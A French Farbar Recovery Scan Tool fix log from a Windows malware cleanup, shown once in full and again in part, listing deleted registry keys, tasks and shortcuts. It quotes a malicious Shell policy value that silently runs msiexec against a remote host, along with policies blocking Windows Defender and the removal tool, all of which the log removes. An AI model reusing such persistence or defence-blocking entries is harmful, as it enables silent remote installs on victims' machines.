Publicité
Publicité
Format du document : text/plain
Prévisualisation
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Exécuté par Pierre (20-03-2018 22:05:48) Run:1
Exécuté depuis C:\Users\Pierre\Desktop
Profils chargés: Pierre (Profils disponibles: defaultuser0 & pierr & Pierre)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
VirusTotal: C:\Program Files (x86)\mb3-setup-35891.35891-3.1.2.1733.exe
C:\Program Files (x86)\mb3-setup-35891.35891-3.1.2.1733.exe
C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk
C:\Users\defaultuser0\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk
C:\Users\pierr\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk
C:\Users\Pierre\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk
C:\Users\WDAGUtilityAccount\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk
C:\Users\Pierre\AppData\Roaming\uTorrent
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F9BAB37E-8830-40D2-B7C3-43784CA878D9}
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F9BAB37E-8830-40D2-B7C3-43784CA878D9}
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{F9BAB37E-8830-40D2-B7C3-43784CA878D9}
C:\WINDOWS\System32\Tasks\Intel\Thunderbolt\Start Thunderbolt service when hardware is detected
C:\WINDOWS\System32\Tasks\Intel\Thunderbolt\Start Thunderbolt service when hardware is detected - (.Intel(R).) -- C:\Program Files (x86)\Intel\Thunderbolt Software\sc.exe (.not file.) [ThunderboltService] (.Orphan.)
DeleteValue: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|Spotify
DeleteValue: HKU\S-1-5-21-684585145-4270999654-1484381816-1004\Software\Microsoft\Windows\CurrentVersion\Run|Spotify
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteKey: HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\MBAMShlExt
DeleteKey: HKLM\Software\Wow6432Node\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\MBAMShlExt
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32
C:\Users\Pierre\AppData\Local\Google\Chrome\User Data\Default\File System\000
C:\Users\Pierre\AppData\Local\Google\Chrome\User Data\Default\File System\001
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\PnkBstrA
DeleteKey: HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\MBAMShlExt
DeleteKey: HKLM\Software\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\MBAMShlExt
DeleteKey: HKLM\Software\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{A7D1F03C-A759-4F0E-827C-8A15C3287FF0}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{489B6BE7-1B0E-4DE3-AC4C-A47FF337F221}
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-684585145-4270999654-1484381816-1004\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj85MjJSFTI2NWMyNYZQMjq5NUZQFTIyOTlQFUNXNTQLMc== /q <==== ATTENTION
ShellExecuteHooks-x32: Pas de nom - {F552DDE6-2090-4bf4-B924-6141E87789A5} - -> Pas de fichier
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> F:\Pierre\Program Files (x86)\java\bin\ssv.dll => Pas de fichier
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> F:\Pierre\Program Files (x86)\java\bin\jp2ssv.dll => Pas de fichier
FF Plugin-x32: @java.com/DTPlugin,version=11.121.2 -> F:\Pierre\Program Files (x86)\java\bin\dtplugin\npDeployJava1.dll [Pas de fichier]
FF Plugin-x32: @java.com/JavaPlugin,version=11.121.2 -> F:\Pierre\Program Files (x86)\java\bin\plugin2\npjp2.dll [Pas de fichier]
FF Plugin HKU\S-1-5-21-684585145-4270999654-1484381816-1004: @my.com/Games -> C:\Users\Pierre\AppData\Local\MyComGames\NPMyComDetector.dll [Pas de fichier]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fdbpcigaolookbahgdofnimidinicfid] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => F:\Pierre\Program Files (x86)\Anti-Malware\mbshlext.dll -> Pas de fichier
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => F:\Pierre\Program Files (x86)\Anti-Malware\mbshlext.dll -> Pas de fichier
Task: {04A1735C-C295-4DC6-98CB-C887E836D9BC} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-01-21] (Google Inc.)
Task: {70859D1A-E349-4593-A908-FFCD20F914EB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-01-21] (Google Inc.)
Task: {B8C32EAC-556F-4AEA-8616-69B0837BB87C} - \Microsoft\Windows\UNP\RunCampaignManager -> Pas de fichier <==== ATTENTION
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NCH Suite.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pixillion Image Converter.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Prism Video File Converter.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spin 3D Mesh Converter.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Switch Sound File Converter.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ZotacFireStorm\FireStorm.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ZotacFireStorm\жÔØ Uninstall.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SIM Dashboard Server\SIM Dashboard Server.lnk
Cmd: netsh advfirewall reset
Cmd: Netsh advfirewall set allprofiles state on
Cmd: ipconfig /flushdns
*****************
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
VirusTotal: C:\Program Files (x86)\mb3-setup-35891.35891-3.1.2.1733.exe => https://www.virustotal.com/file/b230dd46fb7238f41c80ea7053cee51f9bb14dbc8ba1775e2364c2c3e12d5482/analysis/1516903882/
C:\Program Files (x86)\mb3-setup-35891.35891-3.1.2.1733.exe => déplacé(es) avec succès
"C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk" => non trouvé(e)
"C:\Users\defaultuser0\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk" => non trouvé(e)
"C:\Users\pierr\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk" => non trouvé(e)
C:\Users\Pierre\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk => déplacé(es) avec succès
"C:\Users\WDAGUtilityAccount\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk" => non trouvé(e)
C:\Users\Pierre\AppData\Roaming\uTorrent => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F9BAB37E-8830-40D2-B7C3-43784CA878D9}" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F9BAB37E-8830-40D2-B7C3-43784CA878D9} => impossible à supprimer. Accès refusé.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{F9BAB37E-8830-40D2-B7C3-43784CA878D9} => impossible à supprimer. Accès refusé.
C:\WINDOWS\System32\Tasks\Intel\Thunderbolt\Start Thunderbolt service when hardware is detected => déplacé(es) avec succès
"C:\WINDOWS\System32\Tasks\Intel\Thunderbolt\Start Thunderbolt service when hardware is detected - (.Intel(R).) -- C:\Program Files (x86)\Intel\Thunderbolt Software\sc.exe (.not file.) [ThunderboltService] (.Orphan.)" => non trouvé(e)
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\Spotify" => supprimé(es) avec succès
"HKU\S-1-5-21-684585145-4270999654-1484381816-1004\Software\Microsoft\Windows\CurrentVersion\Run\\Spotify" => non trouvé(e)
"HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
"HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
"HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\MBAMShlExt" => supprimé(es) avec succès
HKLM\Software\Wow6432Node\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3} => non trouvé(e)
"HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\MBAMShlExt" => supprimé(es) avec succès
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
C:\Users\Pierre\AppData\Local\Google\Chrome\User Data\Default\File System\000 => déplacé(es) avec succès
C:\Users\Pierre\AppData\Local\Google\Chrome\User Data\Default\File System\001 => déplacé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\Services\PnkBstrA" => supprimé(es) avec succès
HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\MBAMShlExt => non trouvé(e)
"HKLM\Software\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}" => supprimé(es) avec succès
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\MBAMShlExt => non trouvé(e)
HKLM\Software\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3} => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A7D1F03C-A759-4F0E-827C-8A15C3287FF0}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{489B6BE7-1B0E-4DE3-AC4C-A47FF337F221}" => supprimé(es) avec succès
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION => restauré(es) avec succès
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => supprimé(es) avec succès
"HKU\S-1-5-21-684585145-4270999654-1484381816-1004\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell" => supprimé(es) avec succès
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{F552DDE6-2090-4bf4-B924-6141E87789A5}" => supprimé(es) avec succès
HKLM\SOFTWARE\WOW6432Node\Classes\CLSID\{F552DDE6-2090-4bf4-B924-6141E87789A5} => non trouvé(e)
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => valeur restauré(es) avec succès
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => valeur restauré(es) avec succès
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}" => supprimé(es) avec succès
"HKLM\Software\Wow6432Node\Classes\CLSID\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => supprimé(es) avec succès
"HKLM\Software\Wow6432Node\Classes\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => supprimé(es) avec succès
"HKLM\Software\Wow6432Node\MozillaPlugins\@java.com/DTPlugin,version=11.121.2" => supprimé(es) avec succès
"HKLM\Software\Wow6432Node\MozillaPlugins\@java.com/JavaPlugin,version=11.121.2" => supprimé(es) avec succès
"HKU\S-1-5-21-684585145-4270999654-1484381816-1004\Software\MozillaPlugins\@my.com/Games" => supprimé(es) avec succès
"C:\Users\Pierre\AppData\Local\MyComGames\NPMyComDetector.dll" => non trouvé(e)
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\eofcbnmajmjmplflapaojjnihcjkigck" => supprimé(es) avec succès
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fdbpcigaolookbahgdofnimidinicfid" => supprimé(es) avec succès
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\gomekmidlodglbbmalcneegieacbdmki" => supprimé(es) avec succès
HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\MBAMShlExt => non trouvé(e)
HKLM\Software\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3} => non trouvé(e)
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\MBAMShlExt => non trouvé(e)
HKLM\Software\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3} => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{04A1735C-C295-4DC6-98CB-C887E836D9BC}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04A1735C-C295-4DC6-98CB-C887E836D9BC}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{70859D1A-E349-4593-A908-FFCD20F914EB}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{70859D1A-E349-4593-A908-FFCD20F914EB}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B8C32EAC-556F-4AEA-8616-69B0837BB87C}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B8C32EAC-556F-4AEA-8616-69B0837BB87C}" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager => impossible à supprimer. Accès refusé.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NCH Suite.lnk => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pixillion Image Converter.lnk => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Prism Video File Converter.lnk => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spin 3D Mesh Converter.lnk => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Switch Sound File Converter.lnk => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ZotacFireStorm\FireStorm.lnk => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ZotacFireStorm\жÔØ Uninstall.lnk => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SIM Dashboard Server\SIM Dashboard Server.lnk => déplacé(es) avec succès
========= netsh advfirewall reset =========
Ok.
========= Fin de CMD: =========
========= Netsh advfirewall set allprofiles state on =========
Ok.
========= Fin de CMD: =========
========= ipconfig /flushdns =========
Configuration IP de Windows
Cache de r‚solution DNS vid‚.
========= Fin de CMD: =========
Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 20-03-2018 22:07:22)
Résultats de la suppression planifiée des clés après redémarrage:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F9BAB37E-8830-40D2-B7C3-43784CA878D9} => impossible à supprimer. Accès refusé.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{F9BAB37E-8830-40D2-B7C3-43784CA878D9} => impossible à supprimer. Accès refusé.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager => impossible à supprimer. Accès refusé.
==== Fin de Fixlog 22:07:22 ====
Exécuté par Pierre (20-03-2018 22:05:48) Run:1
Exécuté depuis C:\Users\Pierre\Desktop
Profils chargés: Pierre (Profils disponibles: defaultuser0 & pierr & Pierre)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
VirusTotal: C:\Program Files (x86)\mb3-setup-35891.35891-3.1.2.1733.exe
C:\Program Files (x86)\mb3-setup-35891.35891-3.1.2.1733.exe
C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk
C:\Users\defaultuser0\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk
C:\Users\pierr\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk
C:\Users\Pierre\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk
C:\Users\WDAGUtilityAccount\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk
C:\Users\Pierre\AppData\Roaming\uTorrent
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F9BAB37E-8830-40D2-B7C3-43784CA878D9}
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F9BAB37E-8830-40D2-B7C3-43784CA878D9}
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{F9BAB37E-8830-40D2-B7C3-43784CA878D9}
C:\WINDOWS\System32\Tasks\Intel\Thunderbolt\Start Thunderbolt service when hardware is detected
C:\WINDOWS\System32\Tasks\Intel\Thunderbolt\Start Thunderbolt service when hardware is detected - (.Intel(R).) -- C:\Program Files (x86)\Intel\Thunderbolt Software\sc.exe (.not file.) [ThunderboltService] (.Orphan.)
DeleteValue: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|Spotify
DeleteValue: HKU\S-1-5-21-684585145-4270999654-1484381816-1004\Software\Microsoft\Windows\CurrentVersion\Run|Spotify
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteKey: HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\MBAMShlExt
DeleteKey: HKLM\Software\Wow6432Node\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\MBAMShlExt
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32
C:\Users\Pierre\AppData\Local\Google\Chrome\User Data\Default\File System\000
C:\Users\Pierre\AppData\Local\Google\Chrome\User Data\Default\File System\001
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\PnkBstrA
DeleteKey: HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\MBAMShlExt
DeleteKey: HKLM\Software\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\MBAMShlExt
DeleteKey: HKLM\Software\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{A7D1F03C-A759-4F0E-827C-8A15C3287FF0}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{489B6BE7-1B0E-4DE3-AC4C-A47FF337F221}
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-684585145-4270999654-1484381816-1004\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj85MjJSFTI2NWMyNYZQMjq5NUZQFTIyOTlQFUNXNTQLMc== /q <==== ATTENTION
ShellExecuteHooks-x32: Pas de nom - {F552DDE6-2090-4bf4-B924-6141E87789A5} - -> Pas de fichier
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> F:\Pierre\Program Files (x86)\java\bin\ssv.dll => Pas de fichier
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> F:\Pierre\Program Files (x86)\java\bin\jp2ssv.dll => Pas de fichier
FF Plugin-x32: @java.com/DTPlugin,version=11.121.2 -> F:\Pierre\Program Files (x86)\java\bin\dtplugin\npDeployJava1.dll [Pas de fichier]
FF Plugin-x32: @java.com/JavaPlugin,version=11.121.2 -> F:\Pierre\Program Files (x86)\java\bin\plugin2\npjp2.dll [Pas de fichier]
FF Plugin HKU\S-1-5-21-684585145-4270999654-1484381816-1004: @my.com/Games -> C:\Users\Pierre\AppData\Local\MyComGames\NPMyComDetector.dll [Pas de fichier]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fdbpcigaolookbahgdofnimidinicfid] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => F:\Pierre\Program Files (x86)\Anti-Malware\mbshlext.dll -> Pas de fichier
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => F:\Pierre\Program Files (x86)\Anti-Malware\mbshlext.dll -> Pas de fichier
Task: {04A1735C-C295-4DC6-98CB-C887E836D9BC} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-01-21] (Google Inc.)
Task: {70859D1A-E349-4593-A908-FFCD20F914EB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-01-21] (Google Inc.)
Task: {B8C32EAC-556F-4AEA-8616-69B0837BB87C} - \Microsoft\Windows\UNP\RunCampaignManager -> Pas de fichier <==== ATTENTION
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NCH Suite.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pixillion Image Converter.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Prism Video File Converter.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spin 3D Mesh Converter.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Switch Sound File Converter.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ZotacFireStorm\FireStorm.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ZotacFireStorm\жÔØ Uninstall.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SIM Dashboard Server\SIM Dashboard Server.lnk
Cmd: netsh advfirewall reset
Cmd: Netsh advfirewall set allprofiles state on
Cmd: ipconfig /flushdns
*****************
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
VirusTotal: C:\Program Files (x86)\mb3-setup-35891.35891-3.1.2.1733.exe => https://www.virustotal.com/file/b230dd46fb7238f41c80ea7053cee51f9bb14dbc8ba1775e2364c2c3e12d5482/analysis/1516903882/
C:\Program Files (x86)\mb3-setup-35891.35891-3.1.2.1733.exe => déplacé(es) avec succès
"C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk" => non trouvé(e)
"C:\Users\defaultuser0\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk" => non trouvé(e)
"C:\Users\pierr\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk" => non trouvé(e)
C:\Users\Pierre\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk => déplacé(es) avec succès
"C:\Users\WDAGUtilityAccount\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mass Effect 2.lnk" => non trouvé(e)
C:\Users\Pierre\AppData\Roaming\uTorrent => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F9BAB37E-8830-40D2-B7C3-43784CA878D9}" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F9BAB37E-8830-40D2-B7C3-43784CA878D9} => impossible à supprimer. Accès refusé.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{F9BAB37E-8830-40D2-B7C3-43784CA878D9} => impossible à supprimer. Accès refusé.
C:\WINDOWS\System32\Tasks\Intel\Thunderbolt\Start Thunderbolt service when hardware is detected => déplacé(es) avec succès
"C:\WINDOWS\System32\Tasks\Intel\Thunderbolt\Start Thunderbolt service when hardware is detected - (.Intel(R).) -- C:\Program Files (x86)\Intel\Thunderbolt Software\sc.exe (.not file.) [ThunderboltService] (.Orphan.)" => non trouvé(e)
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\Spotify" => supprimé(es) avec succès
"HKU\S-1-5-21-684585145-4270999654-1484381816-1004\Software\Microsoft\Windows\CurrentVersion\Run\\Spotify" => non trouvé(e)
"HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
"HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
